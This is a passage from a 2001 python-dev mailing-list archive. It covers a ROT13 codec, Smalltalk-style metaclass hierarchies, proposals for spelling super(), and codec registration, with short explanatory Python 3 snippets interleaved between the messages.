Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vgf bja vairefr). Gur
znva qvssrerapr sebz gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/python; charset=us-ascii;
 name="rot_13.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="rot_13.py"

#!/usr/local/bin/python2.1
""" 
Python Character Mapping Codec for ROT13.

See http://ucsub.colorado.edu/~kominek/rot13/ for details.

Written by Marc-Andre Lemburg (mal@lemburg.com).

"""#"

import codecs

### Codec APIs

class Codec(codecs.Codec):

    def encode(self,input,errors='strict'):

        return codecs.charmap_encode(input,errors,encoding_map)
        
    def decode(self,input,errors='strict'):

        return codecs.charmap_decode(input,errors,decoding_map)

class StreamWriter(Codec,codecs.StreamWriter):
    pass
        
class StreamReader(Codec,codecs.StreamReader):
    pass

### encodings module API

def getregentry():

    return (Codec().encode,Codec().decode,StreamReader,StreamWriter)

### Decoding Map

decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
   0x0041: 0x004e,
   0x0042: 0x004f,
   0x0043: 0x0050,
   0x0044: 0x0051,
   0x0045: 0x0052,
   0x0046: 0x0053,
   0x0047: 0x0054,
   0x0048: 0x0055,
   0x0049: 0x0056,
   0x004a: 0x0057,
   0x004b: 0x0058,
   0x004c: 0x0059,
   0x004d: 0x005a,
   0x004e: 0x0041,
   0x004f: 0x0042,
   0x0050: 0x0043,
   0x0051: 0x0044,
   0x0052: 0x0045,
   0x0053: 0x0046,
   0x0054: 0x0047,
   0x0055: 0x0048,
   0x0056: 0x0049,
   0x0057: 0x004a,
   0x0058: 0x004b,
   0x0059: 0x004c,
   0x005a: 0x004d,
   0x0061: 0x006e,
   0x0062: 0x006f,
   0x0063: 0x0070,
   0x0064: 0x0071,
   0x0065: 0x0072,
   0x0066: 0x0073,
   0x0067: 0x0074,
   0x0068: 0x0075,
   0x0069: 0x0076,
   0x006a: 0x0077,
   0x006b: 0x0078,
   0x006c: 0x0079,
   0x006d: 0x007a,
   0x006e: 0x0061,
   0x006f: 0x0062,
   0x0070: 0x0063,
   0x0071: 0x0064,
   0x0072: 0x0065,
   0x0073: 0x0066,
   0x0074: 0x0067,
   0x0075: 0x0068,
   0x0076: 0x0069,
   0x0077: 0x006a,
   0x0078: 0x006b,
   0x0079: 0x006c,
   0x007a: 0x006d,
})

### Encoding Map

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

### Filter API

def rot13(infile, outfile):
    outfile.write(infile.read().encode('rot-13'))

if __name__ == '__main__':
    import sys
    rot13(sys.stdin, sys.stdout)

--------------5800C85BDAA2AC1AD23ED42E--
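A minimal sketch of the same character mapping in Python 3, assuming str.maketrans in place of the charmap tables above. It also checks the property that matters for ROT13: applying it twice restores the input, so the encoding and decoding maps coincide. Python 3 ships a "rot13" text-to-text codec, used here only as a cross-check.

```python
import codecs
import string

# Map each ASCII letter to the letter 13 places later in its own case,
# wrapping around; every other character is left unchanged.
_lower = string.ascii_lowercase
_upper = string.ascii_uppercase
ROT13_TABLE = str.maketrans(
    _lower + _upper,
    _lower[13:] + _lower[:13] + _upper[13:] + _upper[:13],
)


def rot13(text):
    """Apply ROT13 with a character map, like the charmap codec above."""
    return text.translate(ROT13_TABLE)


if __name__ == "__main__":
    sample = "Here's a little fun codec to play with."
    scrambled = rot13(sample)
    print(scrambled)  # Urer'f n yvggyr sha pbqrp gb cynl jvgu.
    # ROT13 is its own inverse: applying it twice restores the input.
    assert rot13(scrambled) == sample
    # It agrees with the rot13 codec bundled with Python 3.
    assert scrambled == codecs.encode(sample, "rot13")
```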


From guido@digicool.com  Wed May  2 23:11:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
 <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
 <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hierarchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
> <none>                Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass.  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> <none>
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dicts.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supporting specialized
> class methods.
> 
> =============================
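A rough Python 3 analogue of the parallel hierarchies above, offered as an illustration rather than a faithful model of Smalltalk-80. Each application class gets its own metaclass, the metaclasses subclass one another in parallel with the classes, and "class methods" live in the metaclass's dict. ObjectMeta, RectangleMeta, SpamRectangleMeta and the method names are hypothetical. Python ends the regress differently from Smalltalk-80: type is an instance of itself, much as Class was in Smalltalk-76.

```python
class ObjectMeta(type):
    """Plays the role of ObjectMetaClass: home of class-side methods."""

    def describe(cls):
        return "class " + cls.__name__


class RectangleMeta(ObjectMeta):
    def unit(cls):
        # A "class method" found via the metaclass, like a class-side
        # method stored in RectangleMetaClass.
        return cls(1, 1)


class SpamRectangleMeta(RectangleMeta):
    pass


class Rectangle(metaclass=RectangleMeta):
    def __init__(self, width, height):
        self.width, self.height = width, height

    def area(self):  # an "instance method", stored in Rectangle's dict
        return self.width * self.height


class SpamRectangle(Rectangle, metaclass=SpamRectangleMeta):
    pass


if __name__ == "__main__":
    print(type(SpamRectangle) is SpamRectangleMeta)       # True
    print(issubclass(SpamRectangleMeta, RectangleMeta))   # True
    print(SpamRectangle.unit().area())                    # 1
    print("unit" in vars(RectangleMeta), "unit" in vars(Rectangle))  # True False
    print(type(type) is type)                             # True
```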

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Wed May  2 22:24:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.
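A sketch of the single rule proposed above, in Python 3 terms, where iter() plays the role of PyObject_GetIter(): anything for which iter() succeeds is acceptable to list() and filter(), whether it is a sequence, an iterator, a dict or a generator. The helper supports_iteration is hypothetical.

```python
def supports_iteration(obj):
    """True if iter(obj) succeeds, the test list() and filter() rely on."""
    try:
        iter(obj)
    except TypeError:
        return False
    return True


def squares(n):
    for i in range(n):
        yield i * i


candidates = {
    "sequence": [3, 1, 2],
    "iterator": iter("abc"),
    "dict": {"x": 1, "y": 2},
    "generator": squares(4),
    "integer": 42,
}

for label, obj in candidates.items():
    if supports_iteration(obj):
        print(label, "->", list(obj))
    else:
        print(label, "-> TypeError from list()")
```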


From michel@digicool.com  Wed May  2 22:43:42 2001
From: michel@digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > <none>
> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  ie, is there a ClassMetaClassMetaClass
which subclasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg@cosc.canterbury.ac.nz  Thu May  3 02:35:29 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).
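Here is how this was eventually resolved. In Python 3, implicit special-method lookup (repr(), len(), ...) goes through type(obj) and never through the object itself. So dict.__repr__, with dict standing in for DictType, is always the method for dictionaries, while repr(dict) uses the metaclass's method. A short check, assuming CPython 3 reprs:

```python
# Attribute access on the class finds the method meant for its instances.
instance_repr = dict.__repr__          # slot wrapper for dict instances
assert instance_repr({'a': 1}) == "{'a': 1}"

# repr() looks __repr__ up on type(obj); for the class dict, that is type.
assert type(dict) is type
assert repr(dict) == type.__repr__(dict) == "<class 'dict'>"

# Binding the metaclass's method to dict gives the "repr of DictType itself" meaning.
class_repr = type.__repr__.__get__(dict)
assert class_repr() == "<class 'dict'>"
```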

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Thu May  3 04:15:41 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel@digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's PostScript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)



From greg@cosc.canterbury.ac.nz  Thu May  3 04:25:12 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm@hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.
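The following Python 3 snippet shows an object that is both a class and an instance. A metaclass supplies a class-level method. The name Meta and the describe() method are made up for the example:

```python
class Meta(type):
    """Hypothetical metaclass: its methods apply to classes, not to their instances."""
    def describe(cls):
        return f"class {cls.__name__} with bases {[b.__name__ for b in cls.__bases__]}"


class Point(metaclass=Meta):
    def __init__(self, x, y):
        self.x, self.y = x, y


p = Point(1, 2)

# Point is an instance (of Meta) and a class (of p) at the same time.
assert isinstance(Point, Meta) and isinstance(p, Point)

# The metaclass method is reachable from the class ...
assert Point.describe() == "class Point with bases ['object']"
# ... but not from instances: instance lookup never consults the metaclass.
assert not hasattr(p, 'describe')
```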



From greg@cosc.canterbury.ac.nz  Thu May  3 04:27:34 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.



From greg@cosc.canterbury.ac.nz  Thu May  3 04:39:08 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves as if it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)



From tim.one@home.com  Thu May  3 06:49:04 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrence calling the basemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrence
calling the basemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes B.foo() or C.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.
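The two readings can be compared in Python 3. Python's eventual super() walks type(self).__mro__ starting just after the class named in the call, which behaves like #1 for this hierarchy. Passing type(self) instead reproduces #2 and its re-entry into A.foo. A length guard stops the recursion in the demo, and the class names A2/D2 are illustrative:

```python
class B:
    def foo(self, trace):
        trace.append('B')

class C:
    def foo(self, trace):
        trace.append('C')

# Reading #1: the search starts after the class that textually contains the call.
class A(B, C):
    def foo(self, trace):
        trace.append('A')
        super(A, self).foo(trace)

class D(A):
    def foo(self, trace):
        trace.append('D')
        super(D, self).foo(trace)

trace1 = []
D().foo(trace1)             # D.foo -> A.foo -> B.foo

# Reading #2: start from self.__class__.  Inside A2.foo on a D2 instance,
# type(self) is D2, so the "next" method is A2.foo again.
class A2(B):
    def foo(self, trace):
        trace.append('A2')
        if len(trace) > 5:  # guard so the demo terminates
            return
        super(type(self), self).foo(trace)

class D2(A2):
    def foo(self, trace):
        trace.append('D2')
        super(type(self), self).foo(trace)

trace2 = []
D2().foo(trace2)            # A2.foo keeps calling itself; B.foo is never reached
```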


From greg@cosc.canterbury.ac.nz  Thu May  3 06:56:07 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.



From pf@artcom-gmbh.de  Thu May  3 07:29:03 2001
From: pf@artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves as if it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people are already familiar with C++ today.  Giving them
something they are already familiar with will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not all that ugly and, AFAICS, would
not introduce any backward-incompatible change to the language.
I'm sure C++ has some other real warts to offer that neither of us
wants to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal@lemburg.com  Thu May  3 08:49:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is a belief that DictType should implicitly inherit attributes and 
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are buried in the "super" part of this 
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, Smalltalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry@digicool.com  Thu May  3 09:24:16 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
 <200105021918.OAA03080@cj20424-a.reston1.va.home.com>
 <3AF052CE.E928BDA1@lemburg.com>
 <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com>
 <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal@lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and self-inverse).
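Python 3 still ships a ROT13 codec. It is now a str-to-str transform reached through codecs.encode() rather than str.encode(). Because ROT13 is its own inverse, encoding twice returns the input:

```python
import codecs

plain = "Mailman i18n test"
scrambled = codecs.encode(plain, 'rot_13')

# ROT13 shifts each ASCII letter 13 places; digits, spaces etc. pass through.
assert scrambled == "Znvyzna v18a grfg"
# A second application undoes the first.
assert codecs.encode(scrambled, 'rot_13') == plain
```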

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik@pythonware.com  Thu May  3 09:11:10 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal@lemburg.com  Thu May  3 10:05:41 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as a nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.
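Here is a minimal sketch of installing a codec through codecs.register(). Unlike the codec in the thread, it does not use the charmap machinery. Instead it is a plain str-to-str function registered under the hypothetical name 'toy_rot13'. It therefore has to be called through codecs.encode()/codecs.decode(), since str.encode() insists on bytes output:

```python
import codecs


def _rot13(text):
    """Shift ASCII letters by 13 places; leave everything else alone."""
    out = []
    for ch in text:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= ch <= 'Z':
            out.append(chr((ord(ch) - ord('A') + 13) % 26 + ord('A')))
        else:
            out.append(ch)
    return ''.join(out)


def _transform(text, errors='strict'):
    # Codec functions return (output, number of input items consumed).
    return _rot13(text), len(text)


def _search(name):
    # The codec registry calls this with a normalized encoding name.
    if name == 'toy_rot13':
        # ROT13 is self-inverse, so the same function serves as encoder and decoder.
        return codecs.CodecInfo(_transform, _transform, name='toy_rot13')
    return None


codecs.register(_search)

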